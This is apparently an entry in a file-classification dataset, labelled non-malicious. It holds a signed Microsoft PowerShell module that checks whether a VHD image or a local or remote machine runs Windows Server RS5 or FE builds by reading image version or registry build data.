rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGZ8wghmbAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIFh1eRlM7vpfcyNRhGD2p01b # 7R1UWqEpDNm2QYTPq7fWMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAXspH6BNY7nbQAAzC1kvWt9mAW2aV64hI290LtAjJOjj9tyjJNAREJUod # Ti94rwhNCwq2Qpv0KJBSuHJ1XYbEkLboaiEPI/5smx7L4A+eGYgZ0dGNoCpVWYpe # FgCRxD0fAmKZ8Ed3S54uX3J+EfpMXkrPhjkfKNvropz0oK7MeUXy74sWd1lUaIpQ # 5smOjzDyQijq8o2dIo6S2GoxZiRcq8wgpT0UY7lhySgmkFFZiU5CUm7xEkHB0rWR # TpDsR3r6kTAX9miBICR+sR/V6zs03MTba8DNLXGLxKq0pdHkclj8ohNFmYDsjewl # /irOwKDbn8oN3G2ptSd59iFx7s5GoqGCFykwghclBgorBgEEAYI3AwMBMYIXFTCC # FxEGCSqGSIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFZBgsq # hkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCBghnvISx3TWuYdWp0s1Tt43KKzwQFCwn2wxdlvF7cmhwIGZdYG2R5O # GBMyMDI0MDIyNjAzMDQxMS4xNzJaMASAAgH0oIHYpIHVMIHSMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl # bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNO # OjE3OUUtNEJCMC04MjQ2MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT # ZXJ2aWNloIIReDCCBycwggUPoAMCAQICEzMAAAHg1PwfExUffl0AAQAAAeAwDQYJ # KoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcNMjMx # MDEyMTkwNzE5WhcNMjUwMTEwMTkwNzE5WjCB0jELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3Bl # cmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjoxNzlFLTRC # QjAtODI0NjElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCC # AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAKyHnPOhxbvRATnGjb/6fuBh # h3ZLzotAxAgdLaZ/zkRFUdeSKzyNt3tqorMK7GDvcXdKs+qIMUbvenlH+w53ssPa # 6rYP760ZuFrABrfserf0kFayNXVzwT7jarJOEjnFMBp+yi+uwQ2TnJuxczceG5FD # HrII6sF6F879lP6ydY0BBZkZ9t39e/svNRieA5gUnv/YcM/bIMY/QYmd9F0B+ebF # Yi+PH4AkXahNkFgK85OIaRrDGvhnxOa/5zGL7Oiii7+J9/QHkdJGlfnRfbQ3QXM/ # 5/umBOKG4JoFY1niZ5RVH5PT0+uCjwcqhTbnvUtfK+N+yB2b9rEZvp2Tv4ZwYzEd # 9A9VsYMuZiCSbaFMk77LwVbklpnw4aHWJXJkEYmJvxRbcThE8FQyOoVkSuKc5OWZ # 2+WM/j50oblA0tCU53AauvUOZRoQBh89nHK+m5pOXKXdYMJ+ceuLYF8h5y/cXLQM # OmqLJz5l7MLqGwU0zHV+MEO8L1Fo2zEEQ4iL4BX8YknKXonHGQacSCaLZot2kyJV # RsFSxn0PlPvHVp0YdsCMzdeiw9jAZ7K9s1WxsZGEBrK/obipX6uxjEpyUA9mbVPl # jlb3R4MWI0E2xI/NM6F4Ac8Ceax3YWLT+aWCZeqiIMLxyyWZg+i1KY8ZEzMeNTKC # EI5wF1wxqr6T1/MQo+8tAgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQUcF4XP26dV+8S # usoA1XXQ2TDSmdIwHwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYD # VR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j # cmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwG # CCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIw # MjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcD # CDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBAMATzg6R/A0ldO7M # qGxD1VJji5yVA1hHb0Hc0Yjtv7WkxQ8iwfflulX5Us64tD3+3NT1JkphWzaAWf2w # KdAw35RxtQG1iON3HEZ0X23nde4Kg/Wfbx5rEHkZ9bzKnR/2N5A16+w/1pbwJzdf # RcnJT3cLyawr/kYjMWd63OP0Glq70ua4WUE/Po5pU7rQRbWEoQozY24hAqOcwuRc # m6Cb0JBeTOCeRBntEKgjKep4pRaQt7b9vusT97WeJcfaVosmmPtsZsawgnpIjbBa # 55tHfuk0vDkZtbIXjU4mr5dns9dnanBdBS2PY3N3hIfCPEOszquwHLkfkFZ/9bxw # 8/eRJldtoukHo16afE/AqP/smmGJh5ZR0pmgW6QcX+61rdi5kDJTzCFaoMyYzUS0 # SEbyrDZ/p2KOuKAYNngljiOlllct0uJVz2agfczGjjsKi2AS1WaXvOhgZNmGw42S # FB1qaloa8Kaux9Q2HHLE8gee/5rgOnx9zSbfVUc7IcRNodq6R7v+Rz+P6XKtOgyC # qW/+rhPmp/n7Fq2BGTRkcy//hmS32p6qyglr2K4OoJDJXxFs6lwc8D86qlUeGjUy # o7hVy5VvyA+y0mGnEAuA85tsOcUPlzwWF5sv+B5fz35OW3X4Spk5SiNulnLFRPM5 # XCsSHqvcbC8R3qwj2w1evPhZxDuNMIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJ # mQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNh # dGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1 # WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEB # BQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjK # NVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhg # fWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJp # rx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/d # vI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka9 # 7aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKR # Hh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9itu # qBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO # ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItb # oKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6 # bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6t # AgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQW # BBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacb # UzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYz # aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnku # aHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIA # QwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2 # VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwu # bWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw # LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93 # d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYt # MjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/q # XBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6 # U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVt # I1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis # 9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTp # kbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0 # sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138e # W0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJ # sWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7 # Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0 # dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQ # tB1VM1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB0jELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxh # bmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjox # NzlFLTRCQjAtODI0NjElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2Vy # dmljZaIjCgEBMAcGBSsOAwIaAxUAbfPR1fBX6HxYfyPx8zYzJU5fIQyggYMwgYCk # fjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIF # AOmGc08wIhgPMjAyNDAyMjYxMDE3NTFaGA8yMDI0MDIyNzEwMTc1MVowdDA6Bgor # BgEEAYRZCgQBMSwwKjAKAgUA6YZzTwIBADAHAgEAAgIZYDAHAgEAAgIR3DAKAgUA # 6YfEzwIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIBAAID # B6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GBAHDEIjghGzYaGDbtF3vI # cHmzY3Gy1BXTRCVb51kPta30B5L2LVT8gT3smO5EYlUCKSHZAkpmzWSjw/pJGu/z # wFMQjx5nEQGdIZ0y+753iTrtMXJ76LBuiHldvmjcg/q/ZOu5d9UHX96QBgZzgepY # K3h7NFMX/10Zzc9Of/2KL4qJMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUt # U3RhbXAgUENBIDIwMTACEzMAAAHg1PwfExUffl0AAQAAAeAwDQYJYIZIAWUDBAIB # BQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQx # IgQgnqFwNQSQ9ZZv9soHacD2O0ZPqnAu2ga3uAR7m+Z9QUMwgfoGCyqGSIb3DQEJ # EAIvMYHqMIHnMIHkMIG9BCDj7lK/8jnlbTjPvc77DCCSb4TZApY9nJm5whsK/2kK # wTCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw # DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x # JjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB4NT8 # HxMVH35dAAEAAAHgMCIEIPokA7jEYMcKLyr8MC0LdMM2hjE55wuYZR4jOpJchD/u # MA0GCSqGSIb3DQEBCwUABIICADZA2nMreg+uMQnsKzeUGxuPMlwtgokke8VkHJdR # oKQBZMpU9hwEmXB0su+EmrsI+RSHOtx9yLqnRPcwPNDgzR34Lx231n3VG7QmBcvI # bNszBOyZQaLczDgArddPe1vwNqUdvNxCjIVCDwQxfD47//K5pzwAIX87kUIKfz/I # hyZnFKJKhTgx8b+rAt3hbfxR0S9ejxdJmrZM8DCiBc7ChIqC1cp4Xr0gnIMF037Z # tLdiOgbuZsoILwG6JUZkgan5u7/ncwPKEqAOMVq9/vvL7hhB2XR56oWfuOcX7U50 # gV9zh3bfU1K3bIuNL4p5ikAxqHEmBfrnz2fQiQwwKYQ5So+mzzBurzNTcUn35qgR # +IMEPqWRxsf9XUqHOFgmWy/Nl6+wfl2U+c42+yD3H/hHClbm3a1AnG8E/mq4icft # fRPsAeb69WFvplDuKPRajuCqx/vfKGU8qUEv5/J/uluSpvRTkD9NW7rcbZh6Lr0m # bHTXAHL8SzLxeyHn08fzGir11+/C1jJbXGTfnDwx1RWPhcCD7tdCSR7R4hg/z8yg # MMmYLp1ZC43wIVbvWH0ez6QQpYJ9xFlcEWD+GMNXkwViMOH95OuOq/UclMI+c5m7 # RmeaIAtlGz4VnjSz7ndW9SjgnuFliUdDTsVQBBHFdeegsVRnoKDz1/iDnoW/TUiC # ymxx # SIG # End signature block
combined_dataset/train/non-malicious/sample_38_80.ps1
sample_38_80.ps1
<################################################### # # # Copyright (c) Microsoft. All rights reserved. # # # ##################################################> Import-Module $PSScriptRoot\Tracer.psm1 function Test-WindowsServerVhd { param ( [Parameter(Mandatory=$true)] [string] $OSName, [Parameter(Mandatory=$true)] [string[]] $OSVersions, [Parameter(Mandatory=$true)] [string] $VhdPath, [Parameter(Mandatory=$false)] [int] $VhdIndex = 1 ) $ErrorActionPreference = 'Stop' if(-not (Test-Path $VhdPath)) { throw "Test-WindowsServerVhd: The vhd '$VhdPath' not found." } $imageDetails = Get-WindowsImage -ImagePath $VhdPath -Index $VhdIndex -ErrorAction Stop $imageVersion = $imageDetails.Version Trace-Execution "Test-WindowsServerVhd: Vhd version of '$VhdPath' index '$VhdIndex' is '$imageVersion'." if (($imageVersion -ne $null) -and ($null -ne ($OSVersions | ? {$imageVersion.StartsWith($_)}))) { Trace-Execution "Test-WindowsServerVhd: The vhd '$VhdPath' is a $OSName Windows Server vhd." return $true } Trace-Execution "Test-WindowsServerVhd: The vhd '$VhdPath' is NOT a $OSName Windows Server vhd." return $false } function Test-WindowsServerComputer { param ( [Parameter(Mandatory=$true)] [string] $OSName, [Parameter(Mandatory=$true)] [string[]] $OSVersions, [Parameter(Mandatory=$true)] [string] $ComputerName, [Parameter(Mandatory=$false)] [PSCredential] $Credential, [Parameter(Mandatory=$true)] [bool] $CheckRemote ) $ErrorActionPreference = 'Stop' Trace-Execution "Checking Windows version on $ComputerName." if ($CheckRemote) { $buildLabEx = Invoke-Command -ComputerName $ComputerName -Credential $Credential ` { Import-Module -Name Microsoft.PowerShell.Management -Force | Out-Null (Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion" -Name BuildLabEx).BuildLabEx } } else { $buildLabEx = (Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion" -Name BuildLabEx).BuildLabEx } if (($buildLabEx -ne $null) -and ($null -ne ($OSVersions | ? {$buildLabEx.StartsWith($_)}))) { Trace-Execution "$ComputerName Windows version $buildLabEx is $OSName." return $true } Trace-Execution "$ComputerName Windows version $buildLabEx is not $OSName." return $false } function Test-Rs5WindowsServerVhd { param ( [Parameter(Mandatory=$true)] [string] $VhdPath, [Parameter(Mandatory=$false)] [int] $VhdIndex = 1 ) return Test-WindowsServerVhd "RS5" @("10.0.17763.", "10.0.17784.") $VhdPath $VhdIndex } function Test-Rs5RemoteComputer { param ( [Parameter(Mandatory=$true)] [string] $ComputerName, [Parameter(Mandatory=$true)] [PSCredential] $Credential ) return Test-WindowsServerComputer "RS5" @("17763.", "17784.") $ComputerName $Credential $true } function Test-Rs5LocalComputer { return Test-WindowsServerComputer "RS5" @("17763.", "17784.") (hostname) $null $false } function Test-FeWindowsServerVhd { param ( [Parameter(Mandatory=$true)] [string] $VhdPath, [Parameter(Mandatory=$false)] [int] $VhdIndex = 1 ) return Test-WindowsServerVhd "FE" @("10.0.20348.") $VhdPath $VhdIndex } function Test-FeRemoteComputer { param ( [Parameter(Mandatory=$true)] [string] $ComputerName, [Parameter(Mandatory=$true)] [PSCredential] $Credential ) return Test-WindowsServerComputer "FE" @("20348.") $ComputerName $Credential $true } function Test-FeLocalComputer { return Test-WindowsServerComputer "FE" @("20348.") (hostname) $null $false } Export-ModuleMember -Function Test-Rs5WindowsServerVhd Export-ModuleMember -Function Test-Rs5RemoteComputer Export-ModuleMember -Function Test-Rs5LocalComputer Export-ModuleMember -Function Test-FeWindowsServerVhd Export-ModuleMember -Function Test-FeRemoteComputer Export-ModuleMember -Function Test-FeLocalComputer # SIG # Begin signature block # MIInvwYJKoZIhvcNAQcCoIInsDCCJ6wCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCDrEImRG8ngWDnN # w40CMrD1t+SMzPpbHZIrAV/9TKGMjqCCDXYwggX0MIID3KADAgECAhMzAAADrzBA # DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA # hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG # 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN # xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL # go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB # tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd # mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ # 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY # 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp # XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn # TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT # e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG # OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O # PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk # ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx # HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt # CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # 